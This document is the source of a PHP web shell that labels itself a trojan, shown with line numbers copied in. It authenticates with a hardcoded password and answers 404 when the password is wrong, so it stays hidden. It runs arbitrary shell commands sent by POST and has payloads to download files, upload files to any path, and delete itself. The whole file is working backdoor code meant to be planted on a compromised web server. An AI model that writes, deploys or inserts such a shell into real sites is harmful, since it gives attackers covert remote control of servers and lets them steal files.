1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
|
<?php
# Tested on PHP 5.4.45 on Debian Wheezy.
#
# To test this trojan locally, run the following in the directory containing
# this file:
# php -S localhost:<port>
# TODO: Change this password. Don't leave the default!
define('PASSWORD', 'the-password');
# Override the default error handling to:
# 1. Bludgeon PHP `throw`-ing rather than logging errors
# 2. Keep noise out of the error logs
set_error_handler('warning_handler', E_WARNING);
function warning_handler($errno, $errstr) {
throw new ErrorException($errstr);
}
# get the POSTed JSON input
$post = json_decode(file_get_contents('php://input'), true);
$cwd = ($post['cwd'] !== '') ? $post['cwd'] : getcwd();
# feign non-existence if the authentication is invalid
if (!isset($post['auth']) || $post['auth'] !== PASSWORD) {
header('HTTP/1.0 404 Not Found');
die();
}
# return JSON to the client
header('content-type: application/json');
# if `cmd` is a trojan payload, execute it
if (function_exists($post['cmd'])) {
$post['cmd']($cwd, $post['args']);
}
# otherwise, execute a shell command
else {
$output = [];
# execute the command
$cmd = "cd $cwd; {$post['cmd']} 2>&1; pwd";
exec($cmd, $output);
$cwd = array_pop($output);
$response = [
'stdout' => $output,
'stderr' => [],
'cwd' => $cwd,
];
die(json_encode($response));
}
# File-download payload
function payload_download ($cwd, $args) {
# cd to the trojan's cwd
chdir($cwd);
# open the file as binary, and base64-encode its contents
try {
$stdout = base64_encode(file_get_contents($args['file']));
$stderr = [];
}
# notify the client on failure
catch (ErrorException $e) {
$stdout = [];
$stderr = [ 'Could not download file.', $e->getMessage() ];
}
die(json_encode([
'stdout' => $stdout,
'stderr' => $stderr,
'cwd' => $cwd,
]));
}
# File-upload payload
function payload_upload ($cwd, $args) {
# cd to the trojan's cwd
chdir($cwd);
# base64-decode the uploaded bytes, and write them to a file
try {
file_put_contents( $args['dst'], base64_decode($args['data']));
$stderr = [];
$stdout = [ "File saved to {$args['dst']}." ];
}
# notify the client on failure
catch (ErrorException $e) {
$stdout = [];
$stderr = [ 'Could not save file.', $e->getMessage() ];
}
die(json_encode([
'stdout' => $stdout,
'stderr' => $stderr,
'cwd' => $cwd,
]));
}
# Trojan autodestruct
function payload_autodestruct ($cwd, $args) {
# attempt to delete the trojan
try {
unlink(__FILE__);
$stdout = [ 'File ' . __FILE__ . ' has autodestructed.' ];
$stderr = [];
}
# notify the client on failure
catch (ErrorException $e) {
$stdout = [];
$stderr = [ 'File ' . __FILE__ . ' could not autodestruct.'];
}
die(json_encode([
'stdout' => [ 'Instructed ' . __FILE__ . ' to autodestruct.' ],
'stderr' => [],
'cwd' => $cwd,
]));
}
|
